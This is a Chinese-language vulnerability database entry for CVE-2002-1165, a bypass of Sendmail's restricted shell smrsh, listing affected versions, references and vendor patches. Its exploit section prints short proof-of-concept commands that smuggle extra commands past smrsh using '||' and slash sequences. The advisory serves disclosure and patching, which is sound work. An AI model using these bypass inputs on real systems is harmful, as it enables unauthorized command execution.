CVE-2002-1165
CVSS4.6
发布时间 :2002-10-11 00:00:00
修订时间 :2016-10-17 22:24:17
NMCOES    

[原文]Sendmail Consortium's Restricted Shell (SMRSH) in Sendmail 8.12.6, 8.11.6-15, and possibly other versions after 8.11 from 5/19/1998, allows attackers to bypass the intended restrictions of smrsh by inserting additional commands after (1) "||" sequences or (2) "/" characters, which are not properly filtered or verified.


[CNNVD]Sendmail SMRSH双重管道访问确认漏洞(CNNVD-200210-266)

        Sendmail 8.12.6版本,8.11.6-15版本,以及来自5/19/1998的8.11之后的可能其他的版本中Sendmail Consortium's Restricted Shell (SMRSH)存在漏洞。攻击者可以通过在(1) "||"序列或(2) "/"字符之后插入附加命令绕过smrsh的故意限制,该漏洞不能正确地被过滤或核实。

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:sendmail:sendmail:8.12.0Sendmail Sendmail 8.12.0
cpe:/o:netbsd:netbsd:1.5.3NetBSD 1.5.3
cpe:/o:netbsd:netbsd:1.5.2NetBSD 1.5.2
cpe:/a:sendmail:sendmail:8.12.2Sendmail Sendmail 8.12.2
cpe:/a:sendmail:sendmail:8.12.1Sendmail Sendmail 8.12.1
cpe:/a:sendmail:sendmail:8.12.4Sendmail Sendmail 8.12.4
cpe:/o:netbsd:netbsd:1.6NetBSD 1.6
cpe:/a:sendmail:sendmail:8.12.3Sendmail Sendmail 8.12.3
cpe:/o:netbsd:netbsd:1.5NetBSD 1.5
cpe:/a:sendmail:sendmail:8.12.6Sendmail Sendmail 8.12.6
cpe:/a:sendmail:sendmail:8.12.5Sendmail Sendmail 8.12.5
cpe:/o:netbsd:netbsd:1.5.1NetBSD 1.5.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1165
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1165
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-266
(官方数据源) CNNVD

- 其它链接及资源

ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2002-023.txt.asc
(UNKNOWN)  NETBSD  NetBSD-SA2002-023
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000532
(UNKNOWN)  CONECTIVA  CLA-2002:532
http://marc.info/?l=bugtraq&m=103350914307274&w=2
(UNKNOWN)  BUGTRAQ  20021001 iDEFENSE Security Advisory 10.01.02: Sendmail smrsh bypass vulnerabilities
http://www.iss.net/security_center/static/10232.php
(VENDOR_ADVISORY)  XF  sendmail-forward-bypass-smrsh(10232)
http://www.mandriva.com/security/advisories?name=MDKSA-2002:083
(UNKNOWN)  MANDRIVA  MDKSA-2002:083
http://www.redhat.com/support/errata/RHSA-2003-073.html
(UNKNOWN)  REDHAT  RHSA-2003:073
http://www.securityfocus.com/bid/5845
(VENDOR_ADVISORY)  BID  5845
http://www.sendmail.org/smrsh.adv.txt
(VENDOR_ADVISORY)  CONFIRM  http://www.sendmail.org/smrsh.adv.txt

- 漏洞信息

Sendmail SMRSH双重管道访问确认漏洞
中危 访问验证错误
2002-10-11 00:00:00 2005-10-20 00:00:00
本地  
        Sendmail 8.12.6版本,8.11.6-15版本,以及来自5/19/1998的8.11之后的可能其他的版本中Sendmail Consortium's Restricted Shell (SMRSH)存在漏洞。攻击者可以通过在(1) "||"序列或(2) "/"字符之后插入附加命令绕过smrsh的故意限制,该漏洞不能正确地被过滤或核实。

- 公告与补丁

        OpenBSD has released patches for OpenBSD 3.0, 3.1 and 3.2 systems.
        NetBSD has released an advisory. Users are advised to upgrade the smrsh binary.
        Users of NetBSD-current are advised to upgrade to NetBSD-current dated 2002-10-04 or later. Users of NetBSD 1.6 are advised to upgrade from NetBSD 1.6 sources dated 2002-10-04 or later. Users of NetBSD 1.5 through 1.5.3 from NetBSD 1.5.* sources dated 2002-10-04 or later. Further details are available in the referenced advisory.
        Users of Gentoo Linux are advised to upgrade using the following commands:
        emerge rsync
        emerge sendmail
        emerge clean
        Conectiva has released an advisory.
        FreeBSD has released an advisory. Users are advised to upgrade vulnerable systems to the 4.7-STABLE branch, or to the appropriate RELENG_4_x branch after the correction date. A patch is also available. Further details may be found in the referenced advisory.
        Mandrake has released a security advisory (MDKSA-2002:083). Fixes for Mandrake Linux are now available.
        SGI has released an advisory. Users are advised to upgrade to IRIX 6.5.19 when available or to install the appropriate patch. Further information is available in the referenced advisory.
        Apple has addressed this issue in MacOS X 10.2.4/MacOS X Server 10.2.4. Users are advised to upgrade.
        HP has released a revised version of their advisory (HPSBUX0212-234) which has been updated to include fix information. Users are advised to upgrade as soon as possible. An upgrade for HP-UX 11.00 and 11.11 has also be made available online and can be accessed using the following link:
        http://www.software.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=SMAIL811
        Fixes are available.
        OpenBSD OpenBSD 3.2
        
        OpenBSD OpenBSD 3.0
        
        OpenBSD OpenBSD 3.1
        
        HP HP-UX 11.0 4
        
        HP HP-UX 11.0
        
        HP HP-UX 11.11
        
        HP HP-UX 11.22
        
        Caldera OpenLinux Server 3.1
        
        Caldera OpenLinux Workstation 3.1
        
        Caldera OpenLinux Server 3.1.1
        
        Caldera OpenLinux Workstation 3.1.1
        
        FreeBSD FreeBSD 4.4
        
        FreeBSD FreeBSD 4.5
        
        FreeBSD FreeBSD 4.6
        
        Sendmail Consortium Sendmail 8.11
        

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Sendmail SMRSH Double Pipe Access Validation Vulnerability
Access Validation Error 5845
No Yes
2002-10-01 12:00:00 2009-07-11 05:06:00
Vulnerability discovery credited to zen-parse <zen-parse@gmx.net>.

- 受影响的程序版本

Sendmail Consortium Sendmail 8.12.6
+ Apple Mac OS X 10.2.4
+ Conectiva Linux Enterprise Edition 1.0
+ FreeBSD FreeBSD 5.0
+ FreeBSD FreeBSD 4.7
+ MandrakeSoft Corporate Server 2.1
+ Mandriva Linux Mandrake 9.0
+ OpenBSD OpenBSD 3.2
+ S.u.S.E. Linux 8.1
Sendmail Consortium Sendmail 8.12.5
+ Conectiva Linux 9.0
+ OpenBSD OpenBSD 3.2
Sendmail Consortium Sendmail 8.12.4
+ OpenBSD OpenBSD 3.2
+ Slackware Linux 8.1
+ Slackware Linux -current
Sendmail Consortium Sendmail 8.12.3
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ FreeBSD FreeBSD 4.6
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
Sendmail Consortium Sendmail 8.12.2
+ Apple Mac OS X 10.2.3
+ Apple Mac OS X 10.2.2
+ Apple Mac OS X 10.2.1
+ Apple Mac OS X 10.2
+ Apple Mac OS X Server 10.2.3
+ Apple Mac OS X Server 10.2.2
+ Apple Mac OS X Server 10.2.1
+ Apple Mac OS X Server 10.2
+ OpenBSD OpenBSD 3.1
Sendmail Consortium Sendmail 8.12.1
+ HP MPE/iX 7.5
+ HP MPE/iX 7.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
Sendmail Consortium Sendmail 8.12 .0
Sendmail Consortium Sendmail 8.11.6
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ FreeBSD FreeBSD 4.5 -RELEASE
+ FreeBSD FreeBSD 4.5
+ FreeBSD FreeBSD 4.4
+ Immunix Immunix OS 7.0
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.0 i386
+ RedHat Linux 6.2 i386
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3
+ Sun Cobalt RaQ 550
+ Sun Linux 5.0.3
+ Sun Linux 5.0
Sendmail Consortium Sendmail 8.11.5
Sendmail Consortium Sendmail 8.11.4
+ Conectiva Linux 7.0
- Slackware Linux 8.0
Sendmail Consortium Sendmail 8.11.3
- MandrakeSoft Corporate Server 1.0.1
- Mandriva Linux Mandrake 8.0
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
- Slackware Linux 7.1
Sendmail Consortium Sendmail 8.11.2
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
Sendmail Consortium Sendmail 8.11.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 6.0
Sendmail Consortium Sendmail 8.11
+ Compaq Tru64 5.1 b
+ Compaq Tru64 5.1 a
+ Compaq Tru64 5.1
+ IBM AIX 5.2
+ IBM AIX 5.1
- Mandriva Linux Mandrake 7.2
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 7.0
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 7.0
+ SCO Open Server 5.0.6 a
+ SCO Open Server 5.0.6
+ SCO Open Server 5.0.5
+ SCO Open Server 5.0.4
Sendmail Consortium Sendmail 8.10.2
+ Sun Cobalt Qube3 4000WG
+ Sun Cobalt RaQ 4
+ Sun Cobalt RaQ XTR
+ Sun Cobalt RaQ XTR 3500R
+ Sun Cobalt RaQ4 3001R
Sendmail Consortium Sendmail 8.10.1
Sendmail Consortium Sendmail 8.10
Sendmail Consortium Sendmail 8.9.3
+ Compaq Tru64 5.1 PK5 (BL19)
+ Compaq Tru64 5.0 a PK3 (BL17)
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ IBM AIX 4.3.3
+ SGI IRIX 6.5.19
+ SGI IRIX 6.5.18 m
+ SGI IRIX 6.5.18 f
+ SGI IRIX 6.5.17 m
+ SGI IRIX 6.5.17 f
+ SGI IRIX 6.5.16 m
+ SGI IRIX 6.5.16 f
+ SGI IRIX 6.5.15 m
+ SGI IRIX 6.5.15 f
+ SGI IRIX 6.5.14 m
+ SGI IRIX 6.5.14 f
+ SGI IRIX 6.5.13 m
+ SGI IRIX 6.5.13 f
+ SGI IRIX 6.5.12 m
+ SGI IRIX 6.5.12 f
+ SGI IRIX 6.5.11 m
+ SGI IRIX 6.5.11 f
+ SGI IRIX 6.5.10 m
+ SGI IRIX 6.5.10 f
+ SGI IRIX 6.5.9 m
+ SGI IRIX 6.5.9 f
+ SGI IRIX 6.5.8 m
+ SGI IRIX 6.5.8 f
+ SGI IRIX 6.5.7 m
+ SGI IRIX 6.5.7 f
Sendmail Consortium Sendmail 8.8.8
+ Compaq Tru64 4.0 g PK3 (BL17)
+ Compaq Tru64 4.0 f PK7 (BL18)
+ SGI IRIX 6.5.6
+ SGI IRIX 6.5.5
+ SGI IRIX 6.5.4
+ SGI IRIX 6.5.3
+ SGI IRIX 6.5.2
+ SGI IRIX 6.5.1
+ SGI IRIX 6.5
OpenBSD OpenBSD 2.9
OpenBSD OpenBSD 2.8
OpenBSD OpenBSD 2.7
OpenBSD OpenBSD 2.6
OpenBSD OpenBSD 2.5
OpenBSD OpenBSD 2.4
OpenBSD OpenBSD 2.3
OpenBSD OpenBSD 2.2
OpenBSD OpenBSD 2.1
OpenBSD OpenBSD 3.2
OpenBSD OpenBSD 3.1
OpenBSD OpenBSD 3.0
NetBSD NetBSD 1.6
NetBSD NetBSD 1.5.3
NetBSD NetBSD 1.5.2
NetBSD NetBSD 1.5.1
NetBSD NetBSD 1.5
HP HP-UX 11.22
HP HP-UX 11.11
HP HP-UX 11.0 4
HP HP-UX 11.0
FreeBSD FreeBSD 4.6
FreeBSD FreeBSD 4.5
FreeBSD FreeBSD 4.4
FreeBSD FreeBSD 4.3
Caldera OpenLinux Workstation 3.1.1
Caldera OpenLinux Workstation 3.1
Caldera OpenLinux Server 3.1.1
Caldera OpenLinux Server 3.1

- 漏洞讨论

Sendmail is a freely available, open source mail transport agent. It is maintained and distributed by the Sendmail Consortium. Sendmail is available for the Unix and Linux operating systems.

smrsh is designed to prevent the execution of commands outside of the restricted environment. However, when commands are entered using either double pipes (||) or a mixture of dot (.) and slash (/) characters, a user may be able to bypass the checks performed by smrsh. This could lead to the execution of commands outside of the restricted environment.

- 漏洞利用

$ echo "echo unauthorized execute" &gt; /tmp/unauth
$ smrsh -c ". || . /tmp/unauth || ."
/bin/sh: /etc/smrsh/.: is a directory
unauthorized execute

OR one of the following types of commands:

smrsh -c "/ command"
smrsh -c "../ command"
smrsh -c "./ command"
smrsh -c "././ command"

- 解决方案

OpenBSD has released patches for OpenBSD 3.0, 3.1 and 3.2 systems.
NetBSD has released an advisory. Users are advised to upgrade the smrsh binary.

Users of NetBSD-current are advised to upgrade to NetBSD-current dated 2002-10-04 or later. Users of NetBSD 1.6 are advised to upgrade from NetBSD 1.6 sources dated 2002-10-04 or later. Users of NetBSD 1.5 through 1.5.3 from NetBSD 1.5.* sources dated 2002-10-04 or later. Further details are available in the referenced advisory.

Users of Gentoo Linux are advised to upgrade using the following commands:

emerge rsync
emerge sendmail
emerge clean

Conectiva has released an advisory.

FreeBSD has released an advisory. Users are advised to upgrade vulnerable systems to the 4.7-STABLE branch, or to the appropriate RELENG_4_x branch after the correction date. A patch is also available. Further details may be found in the referenced advisory.

Mandrake has released a security advisory (MDKSA-2002:083). Fixes for Mandrake Linux are now available.

SGI has released an advisory. Users are advised to upgrade to IRIX 6.5.19 when available or to install the appropriate patch. Further information is available in the referenced advisory.

Apple has addressed this issue in MacOS X 10.2.4/MacOS X Server 10.2.4. Users are advised to upgrade.

HP has released a revised version of their advisory (HPSBUX0212-234) which has been updated to include fix information. Users are advised to upgrade as soon as possible. An upgrade for HP-UX 11.00 and 11.11 has also be made available online and can be accessed using the following link:

http://www.software.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=SMAIL811

Fixes are available.


OpenBSD OpenBSD 3.2

OpenBSD OpenBSD 3.0

OpenBSD OpenBSD 3.1

HP HP-UX 11.0 4

HP HP-UX 11.0

HP HP-UX 11.11

HP HP-UX 11.22

Caldera OpenLinux Server 3.1

Caldera OpenLinux Workstation 3.1

Caldera OpenLinux Server 3.1.1

Caldera OpenLinux Workstation 3.1.1

FreeBSD FreeBSD 4.4

FreeBSD FreeBSD 4.5

FreeBSD FreeBSD 4.6

Sendmail Consortium Sendmail 8.11

Sendmail Consortium Sendmail 8.11.1

Sendmail Consortium Sendmail 8.11.4

Sendmail Consortium Sendmail 8.11.6

Sendmail Consortium Sendmail 8.12 .0

Sendmail Consortium Sendmail 8.12.1

Sendmail Consortium Sendmail 8.12.2

Sendmail Consortium Sendmail 8.12.3

Sendmail Consortium Sendmail 8.12.4

Sendmail Consortium Sendmail 8.12.5

Sendmail Consortium Sendmail 8.12.6

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站